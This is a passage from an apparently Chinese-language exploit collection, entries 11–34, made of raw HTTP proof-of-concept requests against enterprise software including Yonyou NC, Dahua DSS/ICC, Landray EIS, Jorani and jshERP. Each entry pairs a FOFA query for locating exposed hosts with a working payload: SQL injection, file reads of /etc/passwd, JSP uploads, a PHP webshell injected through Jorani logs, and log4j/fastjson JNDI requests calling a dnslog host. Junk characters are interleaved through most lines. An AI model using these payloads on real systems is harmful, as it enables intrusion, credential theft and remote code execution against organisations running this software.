11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
# X4 s, h/ W9 H, \! x. ~# BFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"6 O. ^5 C& Y) {8 t+ p, F
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
+ t1 D: b9 ?! s2 d5 M% QHost: 127.0.0.14 r3 N/ B. { _
Pragma: no-cache
$ a0 ~$ X% X- U v" e0 Q2 ~9 rCache-Control: no-cache
7 ?- r Q1 |3 z+ ~Upgrade-Insecure-Requests: 1
J$ D4 i9 O9 k3 @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
: [* `! r5 T# l4 I/ M1 ~" WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* _; n5 p0 ^/ ]' @/ o- OAccept-Encoding: gzip, deflate1 n* C8 i: x* U% g2 ]
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8/ F8 f$ \% c1 o. T+ f
Connection: close$ B* R! n4 Z: _+ V% ?- A
4 ] S t# j) S& F0 O7 { W
; s7 l* L* [% V0 \6 j4 M$ g
12. Jorani < 1.0.2 远程命令执行
0 i4 ^' b" K: ]5 T. F# f, WFOFA:title="Jorani"
5 D5 |( D. Z4 Z第一步先拿到cookie. c& I) o! h3 A) F( @- S0 ]
GET /session/login HTTP/1.1
9 f3 W0 \# R. {1 ]9 m* tHost: 192.168.190.30
- s4 S4 B, X! s1 v% {0 u' eUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36: A n) M$ V* T b9 w
Connection: close3 z8 |$ i+ ~: b. J( F
Accept-Encoding: gzip
Y6 n. G3 j% h6 Y# n% [6 m4 m! O( y" `0 I) [
. N0 `" W" a, u9 X
响应中csrf_cookie_jorani用于后续请求
8 O0 w$ o- `$ n% {HTTP/1.1 200 OK' A) T" ?0 s( b( h* ?5 K3 i
Connection: close
; W5 Q9 Z0 b7 E' e* \Cache-Control: no-store, no-cache, must-revalidate: f6 Z9 L1 M" _$ g) ~2 p
Content-Type: text/html; charset=UTF-8! k6 ?. J9 U0 f, [) p
Date: Tue, 24 Oct 2023 09:34:28 GMT
+ O- Z: G# y' U* v. i/ QExpires: Thu, 19 Nov 1981 08:52:00 GMT* \) y% U. X/ T& O9 ]% S7 ~
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
* }8 I( v$ s5 j2 ?. P z/ \Pragma: no-cache) r: y( {% G! d- R1 V) ^5 P* Y
Server: Apache/2.4.54 (Debian)
( t3 z% }; B# q) ISet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/' p3 i, {! _! Z8 h4 V
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
* s# \/ Y1 `9 l) G- _# QVary: Accept-Encoding
P5 j) u* f I. q4 d" S
8 [* H+ J7 N7 j# r9 U3 M9 I
3 ^% `* k; U* rPOST请求,执行函数并进行base64编码' |2 A% T: h6 D M0 h* L: i
POST /session/login HTTP/1.1
- x, E/ ]+ h1 i/ r C! ~. BHost: 192.168.190.30
' o# r% Q3 z1 w* |& w* b: GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
( L9 k9 |6 m( [: _2 k0 NConnection: close0 Q5 O# b. j6 x+ I+ d+ R$ \0 s, V/ O4 P
Content-Length: 252
/ d$ s1 {$ X# s Y2 y. N# Y6 M8 TContent-Type: application/x-www-form-urlencoded
: ~# x# Y1 M4 V, b8 @7 OCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
! V! w9 c" V+ s: c- kAccept-Encoding: gzip
: V$ L# {/ l3 w' A+ Z6 ^( c) k
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
) Y$ m$ y5 m2 N9 N1 g% {3 F/ n& R
. u1 o3 @9 |9 m( y
- ?1 ] _. j L: |: x8 f' V9 V3 j* w' Z$ i6 |. T
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
: B7 |/ B* {, d8 BGET /pages/view/log-2023-10-24 HTTP/1.1# `8 Z [5 y3 A) S2 {$ q' s* K
Host: 192.168.190.30; Y2 w3 y$ g( n9 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
. l* G3 f. h; \/ lConnection: close
0 u2 u @+ [0 ^( E: P, B; iCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
# J* S/ j% l b+ {6 i4 _K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=7 ], |1 P7 V7 F( ^" o; o
X-REQUESTED-WITH: XMLHttpRequest
: q5 B4 x- T2 f7 kAccept-Encoding: gzip( |' O# {+ _! Q& z: h: h
5 |! V* g) q7 \, n8 r& z$ z Q* g B, I& K, n9 M" k
13. 红帆iOffice ioFileDown任意文件读取6 ]3 M, l4 u, E6 s8 F
FOFA:app="红帆-ioffice"+ X2 [9 g. ~" p* K" N
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
" J; S- p, J1 x* s3 J! tHost: x.x.x.x2 D, S4 v( y M4 p2 B5 p* d; K
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
* q/ T. C0 A2 P, P0 n9 W$ JConnection: close
& @3 P3 {* s3 [6 S: DAccept: */*
6 q, b8 S* S% g2 MAccept-Encoding: gzip& @7 R) B; N/ |# ^9 d9 D
+ ]& e* B1 P* C7 N7 O0 H8 D
* |; A: I, v5 [8 Z4 u7 b14. 华夏ERP(jshERP)敏感信息泄露
: q* M4 V5 x# HFOFA:body="jshERP-boot"
# }& ~+ t2 s7 B2 n* {泄露内容包括用户名密码, Q8 n( U' w& y% V% S2 J l
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
4 U) V, Z8 d& {5 O5 WHost: x.x.x.x2 J/ K8 i: |) M! [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
. Y* Z/ T5 a( i) Z- AConnection: close
0 C5 y }% g+ L. ]Accept: */*/ G! P1 h. R/ P0 y
Accept-Language: en$ ~, p! H" @ c2 n
Accept-Encoding: gzip8 Q h+ J* L7 @' L9 V: H; |
* W6 G1 @2 |, a( l8 i7 S+ g, }; Z6 X4 |. t$ z
15. 华夏ERP getAllList信息泄露
' k( b# t) k3 d) PCVE-2024-0490; g# k& W; n- T' e4 d
FOFA:body="jshERP-boot"
: W! M' J3 k( s* q$ D) S3 G泄露内容包括用户名密码 q# z+ G" _5 J$ ~) ?. a
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1! v8 a: Y3 }* n* Y/ H3 ?2 q5 k
Host: 192.168.40.130:100; q& k! I9 y5 j* G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
" Z9 |' T5 Z* ? dConnection: close: n5 v, ^1 h& |2 ^
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
1 b* s6 g, n, ]$ p y+ fAccept-Language: en& O$ T4 \& S$ W" D
sec-ch-ua-platform: Windows
2 x4 Z7 x$ K, X: R3 Y6 o4 RAccept-Encoding: gzip; u" _* o7 J5 }; M
3 i: E- r" }. p- c& [6 p+ S/ v) y: x1 x
9 M3 G) G4 n) |( ] U16. 红帆HFOffice医微云SQL注入$ S4 z! D$ _8 U% ^1 c- x
FOFA:title="HFOffice"
r( e, c/ L5 k$ G1 hpoc中调用函数计算1234的md5值
" i6 _! X- H5 b |; T! fGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1 Z1 ` W% Q. `0 `! a9 x* T
Host: x.x.x.x
) e0 \! D: f, n4 rUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36) V/ z4 N: l7 ? S( d$ g
Connection: close
/ Y/ E$ d# ~3 `$ l: I2 R" m# bAccept: */*
! q# C% i+ L0 [Accept-Language: en3 h8 T; K+ `. F8 [0 ?" F, x
Accept-Encoding: gzip
6 X) r1 ?7 b: k7 @, o8 ~; c1 P6 p6 u7 C8 g9 o
, U* x# D; g# g3 i17. 大华 DSS itcBulletin SQL 注入. p5 _' T& {6 d* ^9 R- p1 q
FOFA:app="dahua-DSS"* p% I5 v1 s% B
POST /portal/services/itcBulletin?wsdl HTTP/1.1
( h! |1 q' e( F7 p4 _5 W3 o9 ~) O* j! DHost: x.x.x.x
! o* R2 z8 ^' b. ^1 f1 iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! v6 s' s0 @8 @Connection: close7 ?" {" w: f" m$ d2 e% g& T
Content-Length: 345# n& w* w5 R" {7 ]' z4 Q
Accept-Encoding: gzip
L7 ~: _& K% q. F( A. D
* u) J. }2 Y' k8 z! d! F- B<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
# }- M# p6 I% F4 u# H2 y<s11:Body>
1 v6 f5 T$ H9 |. c+ I <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>+ n& {* ~8 m% F% J
<netMarkings>
* n6 b% l. f) |* m (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
( E# L# e1 h) p9 w" A5 p9 _& t </netMarkings>; M0 O& G& r5 I5 x& [- _
</ns1:deleteBulletin>. }! N6 t1 P* u% v+ Q
</s11:Body>
( c: l% p0 u+ T7 i3 Z# x5 S: ~2 g1 [: h</s11:Envelope>
3 {" J) O& Q$ e* W
( V* t% S; g9 c+ ^. J) k3 T
0 K- H, r' o! B" ~18. 大华 DSS 数字监控系统 user_edit.action 信息泄露( Y- ?4 H1 w. E9 p# j) Y8 w
FOFA:app="dahua-DSS"
' x4 [( f2 b+ \6 r9 m2 K1 zGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1% U }9 T' K; s; U; b
Host: your-ip+ {' V) B0 o8 `: O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( @% {6 s* U: Q! Y: V
Accept-Encoding: gzip, deflate6 X* ~4 {3 @; {( S p
Accept: */*
& g' u! o& L+ G+ [3 M d+ @. A! dConnection: keep-alive I7 K" Y. ?# y2 k5 @: u
/ g7 R* @3 w; x$ v
, r+ i7 g5 e9 v* _: ?/ w% m( N
% t8 e5 i1 I; I0 |19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
& C5 @2 U6 A+ p6 @FOFA:app="dahua-DSS"
" E1 O H# j) E7 MGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
, S- x! a* |3 I- BHost:
@7 O( b3 q' ?$ ]# U2 zUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.364 A7 G) q( _9 A/ U
Accept-Encoding: gzip, deflate
5 U0 Y% |$ J% r% v' @Accept: */*
* t7 O \/ ]+ a2 J2 k* h( V( TConnection: keep-alive
1 A# J5 R. |. I/ b" R
3 D7 N: f3 {) r7 W6 Q1 x2 ]" J$ z B
( b/ y* i# y5 T) q% Y20. 大华ICC智能物联综合管理平台任意文件读取
" {2 u+ p# \- [5 G9 JFOFA:body="*客户端会小于800*"; D' @% @7 w" W3 z; L: `/ \, L" I) `
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1' w" ]5 t. T: _; v: P1 z
Host: x.x.x.x
& M2 N. K# I+ k- N2 s+ MUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
! e5 o# h+ u1 y% n4 tConnection: close1 p+ Q" ]* c7 U J
Accept: */*2 e: ]+ o9 C. x& {
Accept-Language: en
7 s* @, s0 c4 b. f9 t/ C& [Accept-Encoding: gzip- h& Y) w: u6 V# T% m3 s
9 V# ?1 R# ?$ @7 U$ U5 t- x4 S: M2 {% e& m! a9 `
21. 大华ICC智能物联综合管理平台random远程代码执行: B5 X1 Z! a. V% q1 T
FOFA:icon_hash="-1935899595"4 a/ n) }' e, u- ]& r
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1, A; t+ d0 Q" x; F8 f3 x4 |: b1 r
Host: x.x.x.x+ W( \' j5 d D3 c$ ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 g+ S8 ]% a, `. V( x$ c
Content-Length: 161+ B1 r6 D% c- i. N9 H1 P
Accept-Encoding: gzip* l/ {1 z5 C% f+ y" Q
Connection: close
4 t( i; Z1 p, p# PContent-Type: application/json;charset=utf-8& b! d% c8 [" q* `
5 `# g- W( [6 {& ^, `7 P{( c$ |+ N( b- d- w4 C# U E
"a":{0 b/ R4 |7 |' z
"@type":"com.alibaba.fastjson.JSONObject",8 F) L u' S; _2 R* N% ~6 ?! G; I
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}3 @8 u0 u0 c& ~5 M
}""
+ _. ^% Q" z1 S. ]6 h+ d' m}8 J: w/ g) U3 \
* C* ~# V6 \! N0 N" i& Y; ]& d+ \- p5 N# T% ?! O: Z
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
) Z) p$ X/ z) r* }6 F1 ZFOFA:icon_hash="-1935899595"
4 F5 }9 `! W8 f! e; h( l9 L" E* uPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
4 V5 s) S& D6 l. kHost: your-ip' k( ~% K3 G. p5 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
* }* m/ ?9 M) [8 B- r, fContent-Type: application/json;charset=utf-8/ p$ ]+ S0 f5 I" E
# \& E* X2 r# T# I$ \7 Y! s{
- S$ m/ J+ @% ~! ~! `: e"loginName":"${jndi:ldap://dnslog}"& H. d- c3 ~4 k- ]/ Y, a1 T
}5 f5 p9 V% y! V) z$ V9 K6 H0 O+ [" `/ t
. d' I! z5 ]/ f, `! q! M# T5 b6 o' b6 j5 V- Y
( g: J+ w) I# e/ ^: U2 w23. 大华ICC智能物联综合管理平台 fastjson远程代码执行5 W% v4 S0 @) o1 a/ \
FOFA:icon_hash="-1935899595"
2 ~# O( ^1 W+ O& L% C$ IPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
0 y7 x9 F1 C" f$ l$ \9 r" |Host: your-ip: l1 b& a j, a( c. Q c- n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 @3 E+ c P$ ]' d2 A4 qContent-Type: application/json;charset=utf-8
4 E# P0 z2 s( O% H& T# Y2 n" oAccept-Encoding: gzip
0 ]4 [/ _$ m8 h2 _( f6 F# Y, J4 ]9 \Connection: close8 Y- |+ w0 j. M9 J5 S" h
: L" U# e8 B6 e; v+ g$ p
{
$ K' v( a# c' Y/ D7 C "a":{1 k0 e; C$ M! V- s! R6 E
"@type":"com.alibaba.fastjson.JSONObject",
4 e; B# L2 y9 k0 E* d9 o5 x' n {"@type":"java.net.URL","val":"http://DNSLOG"}2 G+ ~; U y% f, E
}""
1 e. d! J2 Q7 r( b# K}
2 F3 h, }; K' ], G! D0 ?* p8 w; ^6 b$ y2 v- B$ z4 K" }
1 u$ T! H1 A) }2 o9 F24. 用友NC 6.5 accept.jsp任意文件上传1 ~# _; @/ v' N% g$ [. S) L. p
FOFA:icon_hash="1085941792"
( l: e/ j1 B8 b, HPOST /aim/equipmap/accept.jsp HTTP/1.1
8 e! D# e" v- e8 b! k! R8 ~Host: x.x.x.x
9 `: W6 u( R2 yUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
% s V4 w: K% u' c/ m8 ?6 m2 d" fConnection: close
# I. `9 u) o* u* i( {0 YContent-Length: 449
( }5 J7 C u% m6 p& b' WAccept: */*
0 Q* V: s; c* {* J; \ q7 @& {Accept-Encoding: gzip/ p- o( h8 r% e, B& i
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
; f B h; ~; h+ L: l$ l+ d3 g. ~8 R9 @2 C2 _8 v7 |# g
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
% |! `' H, O: P" G; VContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"% `7 T; m) |/ R
Content-Type: text/plain
. n6 B/ T" s; B4 p5 O9 F U5 T
) ~. m; N0 S* Q' l) O<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>1 V# T8 _) G! W( K
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc1 X) D; A0 {0 l4 K' b8 j8 [2 Q
Content-Disposition: form-data; name="fname"
, O! X4 m2 P z) \( O" U- t; a# a. q
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
) R, I& D) T% h7 x-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--( ~9 \4 E; E0 Q; e# c" b1 P& K. ?
- M" i. E; [! i/ `0 p/ L: {' W1 g6 J8 u8 V2 ?% F0 R- I, F
25. 用友NC registerServlet JNDI 远程代码执行" w4 u% v/ V: G; C' {/ N* {6 g
FOFA:app="用友-UFIDA-NC"2 _3 d& m0 }; d8 C: b: D
POST /portal/registerServlet HTTP/1.1
# D# v7 o, K- h2 [; ^' m2 j; Q/ |9 BHost: your-ip0 T* v3 W' n L+ P7 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
" |9 [; k1 A5 C) v. _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
- u" k& P6 L) s6 tAccept-Encoding: gzip, deflate
+ N% D( C2 H' g' Z' G" I: h6 H* hAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
) M" ^9 {4 T6 y7 D NContent-Type: application/x-www-form-urlencoded9 r7 h6 r/ z& B. i- p
7 F3 z3 s$ _$ ] \- y3 ]type=1&dsname=ldap://dnslog
6 A# v5 G( h/ O, u0 Q. b: ]# [- `
- ^* E- O) j5 f- O3 ?1 @4 i6 d1 Z9 `( [1 H8 `6 n j
# `5 V% U p# R+ c' {, D& |, ]26. 用友NC linkVoucher SQL注入
9 n4 l5 u6 {& v; {0 N* W6 R$ QFOFA:app="用友-UFIDA-NC"8 n; g2 p4 L' D# K5 H& S3 r( _" t% i3 \
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
2 I4 Z7 p: t e: V0 x5 ^ A2 s( hHost: your-ip
- p9 M% ~! r5 q& V) ?8 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- X' ]; H- x- D! r- q, p; I
Content-Type: application/x-www-form-urlencoded
6 V. o* f; R8 K; z+ g# }, E# ]Accept-Encoding: gzip, deflate/ g& g* ]3 g+ _/ M1 @
Accept: */*
! J% A- D3 r( o) W, H& m# dConnection: keep-alive
/ W7 {9 w* w+ j, Z2 m+ c, c5 @. K9 z1 V4 g, x p! i$ Z {
$ U6 b1 {+ k+ g* n0 f27. 用友 NC showcontent SQL注入
! Z& f8 p) B- Q* J! F! ?FOFA:icon_hash="1085941792"
6 G! _$ H+ A' v- y( x7 e; tGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.10 H& B `) ^, B# H6 g
Host: your-ip; w% R* E: n+ H. g5 u2 B. m2 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! k) D. G' B. f* _ o
Accept-Encoding: identity
+ K. O- \& F5 p: T. s: I) \" FConnection: close+ n* d! @- n9 l, c$ o" @7 B
Content-Type: text/xml; charset=utf-86 a$ o* v1 \& x. |7 x+ a
% k$ }2 u9 [7 w. k) N
) S5 T1 V) M' w6 e* N
28. 用友NC grouptemplet 任意文件上传
! z9 e- {3 X, n+ Y; r9 H DFOFA:icon_hash="1085941792"* a! q2 B7 ?$ [- E. o( g
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1$ q( g( C+ b0 i5 o3 {3 w
Host: x.x.x.x
- l. Y: t0 J2 M2 F# m) A, }: o/ j2 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36* v- z' T1 p; `/ }' T
Connection: close
5 J2 a3 k6 p8 x0 O" }2 ~$ L8 M) zContent-Length: 268& v/ } L3 ~9 `, F: H' c- m* v
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk9 q+ P/ S! c F4 P" q
Accept-Encoding: gzip
" J; {$ f4 o7 {2 E1 _" o0 ~$ S" I
8 s( ]! C9 `3 E3 T6 L. [0 w3 r------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
. r C2 D: V' y @Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"" e4 f' _( o5 ~ C
Content-Type: application/octet-stream' R$ V/ ^2 G4 x8 Q
: x) M7 ?7 v. c/ X% L
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>& C6 I. W' ~ C8 {5 s" r
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--+ e5 E% m$ z6 m- y7 X" k
) h/ D" R9 a5 A5 }9 {
! W% Y/ p P- G+ O8 w9 w. N) q4 L
/uapim/static/pages/nc/head.jsp
7 T: Y; e/ M6 a2 Y
Z$ a$ X# U% G29. 用友NC down/bill SQL注入/ [" ^ {* O2 D# E) [1 t
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"1 c+ X3 n `- _" m( x4 G
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1# S$ D8 Z* w& E# B% z
Host: your-ip
0 D4 \. x/ g1 V8 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 i5 P& Q1 M; b6 GContent-Type: application/x-www-form-urlencoded
4 W6 P7 e: V0 W2 z sAccept-Encoding: gzip, deflate6 h) i1 x7 G; n. g' F% ~
Accept: */*' E$ z6 a4 x2 c0 h/ X
Connection: keep-alive7 u0 M6 F0 Q8 M7 B9 u% m0 U4 n/ E
; j( C4 T4 F3 T+ J' B0 x6 ]
5 f7 o/ R8 \) u5 t `% R' k9 {6 _
30. 用友NC importPml SQL注入
- }' J- y" w4 t/ f1 u' N; aFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
! d/ N5 j0 g: l/ OPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
4 {3 T/ N/ ], i9 z: [0 THost: your-ip
$ c1 h. ^2 C! I2 l7 b/ SContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V I4 V3 z( w( D: V, k. ^# y$ o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36! Y: N; e0 X1 o
Connection: close- E* B7 U" `/ O* |/ K+ Z: r2 S) I
# z/ X0 M" l, I% P- ?- `------WebKitFormBoundaryH970hbttBhoCyj9V
; r! ^" I# v. y' n1 R t0 O0 yContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
' q- E) I9 Y. {# D5 I& JContent-Type: image/jpeg8 k5 }% e5 K% A+ r
------WebKitFormBoundaryH970hbttBhoCyj9V--: e8 `* g7 `9 V% Q8 D- o! S
3 `% ~2 h& l: |& F3 z, T, K3 g3 ?; i, l1 w8 z; E* C
31. 用友NC runStateServlet SQL注入
5 G! O$ ^7 B; Z% j5 Nversion<=6.5! @) w& j; M. a8 Y! R! @
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"/ X' L* i1 P [# T2 f% [
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.12 D8 C1 ^* z3 u% F ^% b3 _9 W
Host: host
. `: B: @8 `" h' V; s* eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36* ^1 D9 p: j8 n$ \' Z8 x) o, S0 q
Content-Type: application/x-www-form-urlencoded
4 w" i- V- ^! o# B9 K0 H3 Q4 m" }! i3 M X# W% D
- K. R" j! d x2 _
32. 用友NC complainbilldetail SQL注入
2 c4 B0 k+ s8 N" m4 ? E! ]5 E' i% _. hversion= NC633、NC65
0 y u2 H& Y# H) _% }, pFOFA:app="用友-UFIDA-NC"
0 o$ _" v1 H8 W5 [9 o' M/ b" AGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1" R6 v4 u8 ~$ X" I
Host: your-ip1 Z) ?1 K- U- ]. h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 Q& B1 X( @- [( A3 yContent-Type: application/x-www-form-urlencoded, w6 Z9 a( ]) x
Accept-Encoding: gzip, deflate
5 q# ~- S* X8 L9 Q0 [2 S4 DAccept: */* _$ ~ S" U5 X6 f
Connection: keep-alive
! w! x/ p& g) A0 J) d+ `; S
6 P6 `! T V4 p. r1 T4 n' ~$ F8 {; W& e% l0 v( E" j6 ?+ i$ F
33. 用友NC downTax/download SQL注入$ q" x# @+ T: _( k- r/ V; g
version:NC6.5FOFA:app="用友-UFIDA-NC"5 X7 Q8 m" O" o
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.11 W3 A* F. c; _1 r
Host: your-ip- h. @" L" u# v0 I9 D& a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( |; U0 _& y9 Y& c2 ^, ] I3 }, H
Content-Type: application/x-www-form-urlencoded
) u/ y& ~) ]# |0 y* FAccept-Encoding: gzip, deflate
2 v m% L" o1 N" H4 a( `Accept: */*
% y3 i0 c" m4 o/ D( v" wConnection: keep-alive! e D- b, g. w- n# z* N# V& E5 }
! Z8 `: N+ ^% L. E1 F$ @- `
/ h" x5 o3 A+ v' |% E# L2 l8 r9 R* |/ [: U
34. 用友NC warningDetailInfo接口SQL注入
3 K, U8 z! c# N; ?$ e0 HFOFA:app="用友-UFIDA-NC") E4 ~& ~- K0 I1 X. J
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
y( g$ P T) j' Z% JHost: your-ip
) Z2 `5 ?: ` q/ f3 H( ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
